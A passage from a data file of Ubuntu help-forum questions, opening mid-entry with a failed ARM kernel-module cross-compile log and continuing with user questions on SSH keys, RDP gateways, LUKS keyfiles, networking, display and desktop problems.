/usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/irqflags.h:21:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:124:0 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/asm-generic/bitops/non-atomic.h : in function ‘__set_bit’ : include/asm-generic/bitops/non-atomic.h:17:23 : error : ‘bits_per_long’ undeclared ( first use in this function ) include/asm-generic/bitops/non-atomic.h:17:23 : note : each undeclared identifier is reported only once for each function it appears in include/asm-generic/bitops/non-atomic.h : in function ‘__clear_bit’ : include/asm-generic/bitops/non-atomic.h:25:23 : error : ‘bits_per_long’ undeclared ( first use in this function ) include/asm-generic/bitops/non-atomic.h : in function ‘__change_bit’ : include/asm-generic/bitops/non-atomic.h:42:23 : error : ‘bits_per_long’ undeclared ( first use in this function ) include/asm-generic/bitops/non-atomic.h : in function ‘__test_and_set_bit’ : include/asm-generic/bitops/non-atomic.h:59:23 : error : ‘bits_per_long’ undeclared ( first use in this function ) include/asm-generic/bitops/non-atomic.h : in function ‘__test_and_clear_bit’ : include/asm-generic/bitops/non-atomic.h:78:23 : error : ‘bits_per_long’ undeclared ( first use in this function ) include/asm-generic/bitops/non-atomic.h : in function ‘__test_and_change_bit’ : include/asm-generic/bitops/non-atomic.h:90:23 : error : ‘bits_per_long’ undeclared ( first use in this function ) include/asm-generic/bitops/non-atomic.h : in function ‘test_bit’ : include/asm-generic/bitops/non-atomic.h:105:21 : error : ‘bits_per_long’ undeclared ( first use in this function ) in file included from include/linux/bitops.h:22:0 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h : at top level : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:217:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:220:0 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/asm-generic/bitops/__fls.h : in function ‘__fls’ : include/asm-generic/bitops/__fls.h:14:12 : error : ‘bits_per_long’ undeclared ( first use in this function ) include/asm-generic/bitops/__fls.h:16:5 : warning : `` bits_per_long '' is not defined [ -wundef ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:221:0 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/asm-generic/bitops/__ffs.h : in function ‘__ffs’ : include/asm-generic/bitops/__ffs.h:16:5 : warning : `` bits_per_long '' is not defined [ -wundef ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:280:0 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/asm-generic/bitops/fls64.h : at top level : include/asm-generic/bitops/fls64.h:17:5 : warning : `` bits_per_long '' is not defined [ -wundef ] include/asm-generic/bitops/fls64.h:25:7 : warning : `` bits_per_long '' is not defined [ -wundef ] include/asm-generic/bitops/fls64.h:33:2 : error : # error bits_per_long not 32 or 64 in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:282:0 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/asm-generic/bitops/sched.h : in function ‘sched_find_first_bit’ : include/asm-generic/bitops/sched.h:14:5 : warning : `` bits_per_long '' is not defined [ -wundef ] include/asm-generic/bitops/sched.h:18:7 : warning : `` bits_per_long '' is not defined [ -wundef ] include/asm-generic/bitops/sched.h:27:2 : error : # error bits_per_long not defined include/asm-generic/bitops/sched.h:29:1 : warning : no return statement in function returning non-void [ -wreturn-type ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/swab.h:18:0 , from include/uapi/linux/swab.h:6 , from include/linux/swab.h:4 , from include/uapi/linux/byteorder/little_endian.h:12 , from include/linux/byteorder/little_endian.h:4 , from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/uapi/asm/byteorder.h:21 , from include/asm-generic/bitops/le.h:5 , from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:308 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/uapi/asm/swab.h : at top level : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/uapi/asm/swab.h:26:29 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from include/uapi/linux/swab.h:6:0 , from include/linux/swab.h:4 , from include/uapi/linux/byteorder/little_endian.h:12 , from include/linux/byteorder/little_endian.h:4 , from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/uapi/asm/byteorder.h:21 , from include/asm-generic/bitops/le.h:5 , from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/bitops.h:308 , from include/linux/bitops.h:22 , from include/linux/kernel.h:10 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/swab.h:20:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from include/linux/kernel.h:10:0 , from include/linux/cache.h:4 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/linux/bitops.h : in function ‘fls_long’ : include/linux/bitops.h:164:2 : error : implicit declaration of function ‘fls64’ [ -werror=implicit-function-declaration ] include/linux/bitops.h : in function ‘__ffs64’ : include/linux/bitops.h:177:5 : warning : `` bits_per_long '' is not defined [ -wundef ] include/linux/bitops.h:180:7 : warning : `` bits_per_long '' is not defined [ -wundef ] include/linux/bitops.h:181:2 : error : # error bits_per_long not 32 or 64 in file included from include/linux/cache.h:4:0 , from include/linux/time.h:4 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/linux/kernel.h : at top level : include/linux/kernel.h:58:5 : warning : `` bits_per_long '' is not defined [ -wundef ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/thread_info.h:16:0 , from include/linux/thread_info.h:54 , from include/linux/preempt.h:9 , from include/linux/spinlock.h:50 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/fpstate.h:32:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/domain.h:14:0 , from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/thread_info.h:28 , from include/linux/thread_info.h:54 , from include/linux/preempt.h:9 , from include/linux/spinlock.h:50 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/barrier.h:9:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/barrier.h:10:3 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/barrier.h:16:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/barrier.h:20:35 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from include/linux/spinlock.h:87:0 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/spinlock.h:4:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/spinlock.h:5:2 : error : # error smp not supported on pre-armv6 cpus in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/spinlock.h:8:0 , from include/linux/spinlock.h:87 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/processor.h:78:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/processor.h:93:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from include/linux/spinlock.h:87:0 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/spinlock.h : in function ‘dsb_sev’ : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/spinlock.h:47:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/spinlock.h : in function ‘arch_spin_lock’ : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/spinlock.h:91:3 : error : implicit declaration of function ‘wfe’ [ -werror=implicit-function-declaration ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/atomic.h:18:0 , from include/linux/atomic.h:4 , from include/linux/spinlock.h:392 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/cmpxchg.h : in function ‘__xchg’ : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/cmpxchg.h:33:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/cmpxchg.h:40:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] in file included from /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/atomic.h:18:0 , from include/linux/atomic.h:4 , from include/linux/spinlock.h:392 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/cmpxchg.h : at top level : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/cmpxchg.h:108:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/cmpxchg.h:112:2 : error : # error `` smp is not supported on this platform '' in file included from include/linux/atomic.h:4:0 , from include/linux/spinlock.h:392 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/atomic.h:32:5 : warning : `` __linux_arm_arch__ '' is not defined [ -wundef ] /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/atomic.h:155:2 : error : # error smp not supported on pre-armv6 cpus /usr/src/linux-headers-3.11.0-12-generic/arch/arm/include/asm/atomic.h:242:3 : error : conflicting types for ‘atomic64_t’ in file included from include/linux/list.h:4:0 , from include/linux/module.h:9 , from /home/erich/dd/hello.c:1 : include/linux/types.h:182:3 : note : previous declaration of ‘atomic64_t’ was here in file included from include/linux/atomic.h:127:0 , from include/linux/spinlock.h:392 , from include/linux/seqlock.h:29 , from include/linux/time.h:5 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/asm-generic/atomic-long.h:21:5 : warning : `` bits_per_long '' is not defined [ -wundef ] in file included from include/linux/time.h:6:0 , from include/linux/stat.h:18 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/linux/math64.h:7:5 : warning : `` bits_per_long '' is not defined [ -wundef ] include/linux/math64.h:49:7 : warning : `` bits_per_long '' is not defined [ -wundef ] include/linux/math64.h : in function ‘div_u64’ : include/linux/math64.h:87:2 : error : implicit declaration of function ‘div_u64_rem’ [ -werror=implicit-function-declaration ] include/linux/math64.h : in function ‘div_s64’ : include/linux/math64.h:98:2 : error : implicit declaration of function ‘div_s64_rem’ [ -werror=implicit-function-declaration ] in file included from include/linux/stat.h:18:0 , from include/linux/module.h:10 , from /home/erich/dd/hello.c:1 : include/linux/time.h : at top level : include/linux/time.h:88:6 : warning : `` bits_per_long '' is not defined [ -wundef ] in file included from include/linux/mmzone.h:9:0 , from include/linux/gfp.h:4 , from include/linux/kmod.h:22 , from include/linux/module.h:13 , from /home/erich/dd/hello.c:1 : include/linux/wait.h:8:25 : fatal error : asm/current.h : no such file or directory cc1 : some warnings being treated as errors compilation terminated . make [ 2 ] : *** [ /home/erich/dd/hello.o ] error 1 make [ 1 ] : *** [ _module_/home/erich/dd ] error 2 make [ 1 ] : leaving directory/usr/src/linux-headers-3.11.0-12-generic' make : * [ all ] error 2 i thought this would be rather straight forward with the cross compiler package being easy to pick up , but it does n't work at all . please help .
439177	changing gui for particular user in ubuntu 13.10	i want to change the gui for particular user in ubuntu . even if i change the session menu in login screen , i dont get ubuntu classic gui and it remains same for all the options . however , it happens for partiular user . for other user , i have ubuntu classic gui . how can i solve this issue ?
439180	can not update via update manager	the following error message appears : an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : e : encountered a section with no package : header . e : problem with mergelist /var/lib/apt/lists extras.ubuntu.com_ubuntu_dists_precise_main_i18n_translation-en . e : the package lists or status file could not be parsed or opened .
439183	ubuntu 12.04 - images can not be loaded anymore	2 symptoms : most of the application icons from the gnome dock , and the background are black . in nautilus , if i browse jpeg images and try to open them , it says : `` could not load image 'zzz.jpg . unrecognized image file format '' . same with eog and most apps . i tried to use unity instead of gnome for my session : icons are displayed in the dock , but images ( jpeg , png ) still can not be opened in the file manager . my guess is that `` image loader '' in gnome or ubuntu is broken .
439184	how is a login via an ssh private/public key associated with a given user	i 've created the private/public key pair using ssh-keygen . i installed the public as described in https : //help.ubuntu.com/community/ssh/openssh/keys and it works without a password , as expected - but only when logging in to root . logging in directly as root is obviously a bad idea . but the question is , how is that key pair associated or restricted to a given userid ? i would n't expect a user to be able to log into any account on a system simply by virtue of having the public key installed on a host ...
439185	problem with graphics when installing ubuntu	when i boot the ubuntu installer from a cd , the graphics are really bad . i barely can read the words . also after booting the cd , it is n't opening a installer but something like demo ubuntu ( again with terrible graphics ) . my video card is nvidia and the driver can be old , but the graphics should n't be so bad ( the colours are strange and the quality is terrible ) .
439187	how to open a gui application and 'disconnect ' it ?	i can run sublime , for example , in the background by typing sublime-text & the & puts it into the background so that i can continue to run commands in my terminal . alternatively , i can run sublime-text which locks up my terminal . if i then press ctrl+z it `` suspends '' the application which essentially freezes it ( it will eventually turn gray ) . typing bg moves it into the background and unlocks the terminal . in any case , if i exit the terminal or type fg and then ctrl+c , the application will close . how do i `` disconnect '' the gui application from the terminal so that it will not close should i close the terminal or press ctrl+c ? in other words , i would like to use the terminal as a launcher , which is particularly convenient when i want to open a specific file : e.g. , sublime-text /path/to/my/file < super-secret-character-that-disconnects-the-app-not-just-puts-it-in-the-bg > .
439191	music lens ignores file assocations in 12.04	i 've tried various tools , including unity tweak , file properties , and details > default applications to assign all audio files to deadbeef , but the music lens stubbornly continues to open songs with rhythmbox . i 'm using ubuntu 12.04 ; what can i do ?
439193	how can i connect to remote windows domain knowing gateway hostname and domain name ?	i have received credentials for my university 's network machine ( ubuntu yay ! ) that i have ssh access to . i would like to connect to it but first i need to connect through a gateway that i have specified in .rdp file received from my university . on windows i just double click on it and i have the session - first asking about domain credentials . i have the following knowledge : username password gateway hostname e.g . secretgateway.net hostname e.g . myhost.local domain name e.g . pluto server port 3389 i know i can use likewise-open for connecting to windows domains but how do i specify it there since it is a remote network for me ? edit after remmina import ( there is no information about domain login nor the gateway ) edit2 i have also tried with xfreerdp : xfreerdp /v : myhost.local /d : pluto /u : user /p : pass /g : secretgateway.net and i get transport_connect : getaddrinfo ( name or service not known ) error : protocol security negotiation failure edit3 using new version of xfreerdp i get to launch my con.rdp file and i get the following $ xfreerdp conn.rdp /p : pass autoreconnection enabled : i:1 devicestoredirect : s : * drivestoredirect : s : * redirectdrives : i:1 server port : i:3389 compression : i:1 keyboardhook : i:2 authentication level : i:0 promptcredentialonce : i:1 gatewayusagemethod : i:1 gatewayprofileusagemethod : i:1 gatewaycredentialssource : i:0 remoteapplicationmode : i:1 remoteapplicationname : s : ubuntu 12.04 v2.1 [ 60 gb hdd ] remoteapplicationprogram : s : ||2fb6eb96-b458-11e3-92eb-00155d020101ssh_sr full address : s : myhost.local gatewayhostname : s : secretgateway.net username : s : platon\wcss-d21d3q connection type : i:5 displayconnectionbar : i:1 screen mode id : i:2 use multimon : i:1 redirectclipboard : i:1 redirectposdevices : i:0 redirectprinters : i:0 redirectcomports : i:0 redirectsmartcards : i:0 session bpp : i:32 allow font smoothing : i:1 allow desktop composition : i:1 disable wallpaper : i:0 disable full window drag : i:0 disable menu anims : i:0 disable themes : i:0 bitmapcachepersistenable : i:1 disable cursor setting : i:0 redirectdirectx : i:1 audiomode : i:0 audiocapturemode : i:0 videoplaybackmode : i:1 loading channel rail connected to secretgateway.net:443 connected to secretgateway.net:443 could not open sam file ! could not open sam file ! could not open sam file ! could not open sam file ! rts_connect error ! status code : 401 http/1.1 401 unauthorized content-type : text/plain server : microsoft-iis/7.5 www-authenticate : negotiate www-authenticate : ntlm www-authenticate : basic realm= '' secretgateway.net '' x-powered-by : asp.net date : wed , 26 mar 2014 00:19:57 gmt content-length : 13 rts_connect error ! rpc_connect failed ! error : protocol security negotiation or connection failure waitforsingleobject : pthread_join failure : 3
439196	stuck in virtual console : tty1	i entered tty1 by pressing ctr , alt +f1 but when i press ctrl , alt +f7 i get list of items that look like this : *starting ... . followed by [ ok } . how do i get back into the regular desktop ? ? help , new to ubuntu and am going crazy using it ! i have rebooted , etc but it keeps taking me back into tty1 even if i press ctrl , alt + f7 ! !
439199	ubuntu 13.10 causing display errors	i have a custom built pc that has windows xp and ubuntu 13.10 dual boot . the pc has an intel core2 duo cpu and nvidia geforce gts 250 . when running either ubuntu or windows , the pc fans will speed up randomly and the screen will go blank before `` no signal '' shows up on the screen . this problem did not occur when only windows was installed . it happens at random times .
439200	how to know the source of ubuntu 64 or 32 bit ?	i have an ubuntu source on a flash stick and i want to know any way that let 's me to know the following with out need to run it . the test computer is windows 7 : 1- the version of ubuntu . 2- 64 bit or 32 bit .
439202	laptop overheats , alternative to speedfan in ubuntu	i used speedfan to help keep my laptop running smoothly , and would like to do the same with ubuntu . could someone please show me a simple alternative to speedfan .
439204	how to edit partition table in ubuntu 12.04.4 lts ?	when installing , i used the advanced setup and i do not recall whether or not i added a swap partition . upon boot i typically have to wait for `` cryptswap1 '' to be ready . it does work , but i usually skip with the `` s '' key . upon this boot , i skipped waiting and proceeded to do some work . currently , i am attempting to install a package from the ubuntu software center named ( i think it 's called 'hibernate ' or 'smartly ' , something like that ) . it requires a swap space , and claims to detect none . if i open the disk utility , this is what i see : anyway , i should get to my point . just wanted to make sure i have as much information as possible if something is important . basically , if i have no swap partition , can i decrease the size of some partitions to add a new swap partition ? if so , how ? and which partitions should i decrease ? i have about 2 gb of ram , but when i had windows 7 on here when i got the laptop , it said only 1.86 or so was usable . if i had created a swap partition , knowing me i would make it twice the ram plus an extra gb 'just in case ' . i know it would n't be used . i think this may be what the 5gb unknown partition is , but it says unknown rather than swap , and it also says `` master boot sector '' as the format . tell me if i 'm right or wrong on this . if i do have a swap partition , why was n't it detected by the software ? is it because i skipped waiting ? if this is correct , would rebooting and waiting fix this ? i would immensely appreciate any help in this issue . i am new to `` ask ubuntu '' , so i do n't know if i will receive an email for any replies . hopefully i will get some sort of email , but if not i should be checking this every once in a while . again , thanks for any help on this . i really appreciate it !
439209	has ubuntuone crashed ?	i can not access my account . it would not let me change my password . this is very worrying . al i get is openid failed openid discovery error : http response status from identity url host is not 200 . got status 503
439210	activate dead key `` ^ '' in german keyboard	i am using a german keabord ( http : //upload.wikimedia.org/wikipedia/commons/3/36/kb_germany.svg ) on ubuntu . as i always write latex mathematical formula with `` kile '' editor , this key `` ^ '' for exponent , is not active there and i have to copy-paste from somewhere else and this is really annoying . it is the same problem also in `` kate '' editor . how can i use this character `` ^ '' which is assigned as a dead key in german layout ? how to activate it ? thanks for suggestions !
439214	ubuntu did n't recognize external subwoofer from laptop asus n550	i 'm trying to get drivers for external subwoofer for the laptop asus n550 because when i installed ubuntu 12.04 lts , the s.o did n't recognize that device . have you some methods or programs to make that ubuntu recognizes the subwoofer ? thanks ! ! !
439215	ubuntu 12.04 secondary ip externally inaccesible	i have added a secondary ip to my virtual server , ubuntu 12.04 running in openvz virtual host . i used ip addr add xx.xxx.168.95/32 label venet0:1 dev venet0 . when i do ifconfig the ip shows up below lo , venet0 and venet0:0 : venet0:1 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr : xx.xxx.168.95 p-t-p : xx.xxx.168.95 bcast:0.0.0.0 mask:255.255.255.255 up broadcast pointopoint running noarp mtu:1500 metric:1 there are issues reaching the secondary ip externally . local access works fine and i 'm using a tomcat instance with ipbased virtual hosting . locally the 2 sites are served correctly . externally i can only reach the one on the main ip . google dns resolves the domain name pointing to the secondary ip in question and on the ubuntu machine i 've added them to hosts as well . i ca n't reach the secondary ip externally , however , not even with ping . it would seem i need to add something to make the secondary ip available to the internet . what am i missing here ? update so , i found the concept of ip alias interesting . here 's my `` interfaces '' file : auto lo iface lo inet loopback auto venet0 iface venet0 inet manual up ifconfig venet0 up up ifconfig venet0 0 up route add default dev venet0 down route del default dev venet0 down ifconfig venet0 down iface venet0 inet6 manual up ifconfig venet0 add yyyy : yyy:5 : :4db/0 down ifconfig venet0 del yyyy : yyy:5 : :4db/0 up /sbin/ip -6 route add 2000 : :/3 dev venet0 auto venet0:0 iface venet0:0 inet static address xx.xxx.168.175 netmask 255.255.255.255 this file also states not to edit that file , but rather to create an `` interfaces.tail '' file with additional rules : auto venet0:1 iface venet0:1 inet static address xx.xxx.168.95 netmask 255.255.255.255 making this file is n't enough however . i need to restart the networking and i tried with /etc/init.d/networking restart but that `` failed to bring up venet0 '' . so i rebooted . the interfaces.tail is n't read .
439218	i got ubuntu 13.10 just the way i like , how can i dual boot windows 7 without messing with ubuntu ?	so i guess i need to set up a `` dual boot '' but when i do my research on google , all i get is how to install ubuntu on windows . i already have ubuntu 13.10 . i love it . i 'm going to be using it for 90 % of everything i do . i 'd still like to use windows 7 from time to time tho . i have a windows 7 disk , how do i go about puting windows on my ubuntu machine ? or am i going to have to install windows and then dual boot ubuntu ? i just got all my tweaks and what not the way i like them . i 'd rather install windows alongside ubuntu vs ubuntu alongside windows , if you know what i mean . thanks
439220	screen recognition issue on ubuntu 13.10	i have got notebook and i want to connect second monitor to him via hdmi , but when i turn on my notebook , it dont see my primary screen . xrandr in terminal says : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 32767 x 32767 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 510mm x 287mm 1920x1080 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 720x400 70.1 virtual1 disconnected ( normal left inverted right x axis y axis ) ( hdmi1 is my second monitor.. he is set as primary and my notebook screen is black and it dont see him . ) but i want to xrandr say this : screen 0 : minimum 320 x 200 , current 3286 x 1080 , maximum 32767 x 32767 edp1 connected primary 1366x768+0+0 ( normal left inverted right x axis y axis ) 293mm x 165mm 1366x768 60.0*+ 1360x768 59.8 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 connected 1920x1080+1366+0 ( normal left inverted right x axis y axis ) 510mm x 287mm > 1920x1080 60.0*+ 1280x1024 75.0 60.0 1152x864 75.0 1024x768 75.1 60.0 800x600 75.0 60.3 640x480 75.0 60.0 > 720x400 70.1 virtual1 disconnected ( normal left inverted right x axis y axis ) ( here i have got both monitors , edp1 is my notebook screen , i 'm happy and i can work ! ^_^ ) this option i have got , when i first turn on my notebook and then plug on my monitor . can somebody help me , how to set this option , when i start my notebook ? or could somebody sent me some links , where i can read about this issue and try to fix it ? i cant find any information , how to set this option , when i start my notebook .
439223	creating virtual machines using ubuntu-vm-builder	i 'm currently trying to install virtual machines on my ubuntu server 13.10 . i followed the instructions from this guide . i was able to install and check if my machine is is supported how ever when i run the command : sudo ubuntu-vm-builder kvm saucy ( i would have to add other options ) how ever , it takes several minutes . the response i get for the next three min : 2014-03-25 20:16:19,822 info : logging to file : /tmp/tmpslry82 2014-03-25 20:16:19,834 info : calling hook : preflight_check 2014-03-25 20:16:19,835 info : calling hook : set_defaults 2014-03-25 20:16:19,836 info : calling hook : bootstrap eventually it gives an error code : ... examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.11.0-18-generic /boot/vmlinuz-3.11.0-18-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.11.0-18-generic /boot/vmlinuz-3.11.0-18-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.11.0-18-generic_3.11.0-18.32_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) this is my first time setting up kvms , any help will be appreciated .
439225	how can i remove the read only on an ipod 30gb	i inherited an old ipod 30gb . i can listen to the music that is on it but i ca n't delete or upload anything . it 's read only . how can i change that ? i probably would like to format it or at least delete the files on it and load my own mp3 files and pictures . what program can i use ? or can i keep the apple programs that make the thing work as an mp3 player ? is this an option with ubuntu ?
439226	unlocking encrypted root ( luks on lvm ) with `` hidden '' usb keyfile	i have a ubuntu server 13.10 machine . its root partition is encrypted with luks , which is then stored in a logical volume . on boot , the lv is mounted and then cryptsetup requests my passphrase ; once that is entered correctly the boot proceeds as usual . following a tutorial ( here , among others ) , i have attempted to utilize a bit of random data stored in the mbr area of a usb thumb drive to unlock the root partition automatically on boot . unfortunately , all the previous examples i have seen involve entire lvm 's encrypted by luks , as opposed to my case of each lv being encrypted individually . when i boot after following the available tutorials , the normal cryptsetup routine requests my passphrase and only then does the keyscript i added to get the keyfile from the usb drive take over . it attempts to open the luks device again , but obviously fails and i am trapped at the second passphrase prompt again . i am a complete newcomer to modifying grub2 and the ramfs . are there any good sources of information on how to do what i propose ? a complete solution would be awesome , but i am willing to read and learn if pointed in the right direction .
439228	xubuntu 13.10 desktop is missing mouse pointer on ( secondary ? ) display	after a standard install of xubuntu 13.10 blank i encountered an almost normal looking desktop , yet the mouse pointer was invisible but fully functional . since i was trying out different display configurations i had a second screen connected to an older nvidia quattro fx 580 graphics card , which was turned off . just by accident i realized that the active screen was mirroring the other , yet the mouse cursor sprite was n't drawn at the the other screen while it was visible on the one i just turned on . is the mouse cursor only drawn on the primary display by default ?
439229	upon system restart , dconf editor does n't save changes	i can use the dconf-editor to change my touchpad settings to natural scrolling , but upon system restart the settings get reverted . ( but not on sleep or hibernate . ) when i open the editor , the option is still orange indicating it has been changed . when i uncheck and recheck the natural scroll option , it is re-enabled . is there a fix , or am i changing the wrong option ? the path is org > gnome > settings-daemon > peripherals > touchpad > natural-scroll . currently running 13.10
439232	how do i access my dvd rom drive on ubuntu ?	i understand that you have to mount your dvd rom or cd rom before using it . i also understand that this has to be done in root in terminal . i know how to get into root . i dont know the code i have to enter in though to mount . also i need to know if i need to make any directories in order to do this . i know the command for making directories . i also need to know how i would check to see if those directories already exist . perhaps i could use the list command to search for a directory that i need in order to use my dvd rom . i also i need to know does this `` mounting '' need to be done each time i want to use my dvd rom ? and do i have to unmount it after im though using it . also is there a bunch of other things i need to do if i wan na say watcha dvd or if i want to acces .mpeg files or txt files on a dvd . please help i am very confused . also i have a e machines computer that is about 13 years old with a dvd rom rewrite drive in it and labelflash . if this makes any difference thank you for your answers
